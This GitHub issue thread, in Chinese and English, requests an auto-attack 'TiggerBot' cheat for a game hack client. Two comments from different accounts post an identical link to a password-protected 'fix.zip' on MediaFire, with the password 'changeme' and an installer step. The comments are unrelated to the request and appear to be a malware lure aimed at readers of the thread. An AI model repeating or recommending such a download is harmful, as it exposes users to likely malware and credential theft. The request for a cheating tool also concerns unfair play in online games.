### ISSUE TITLE
加入TiggerBot

### ISSUE THREAD

**Issue by chenzirui001** [xia-mc/Raven-XD#756]
### Pre-suggestion checklist

- [X] I have searched existing issues and didn't find any previous issues with the same suggestion.
- [X] This is only one suggestion. I understand that GitHub issues don't work well with lists.
- [X] This feature doesn't already exist in the latest version of Raven XD. I've made sure my installation is up to date.
- [ ] I have looked at the code and am reasonably confident that this suggestion is possible to implement.

### What type of improvement are you suggesting?

Adding a new hack.

### Description

-TiggerBot是一个战斗类功能，在准星指向目标时会自动攻击。
-希望能加入的的设置选项：
点击模式
开始攻击距离（3-6）
忽略队友

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by uexeduck** [comment]
tiggerbot
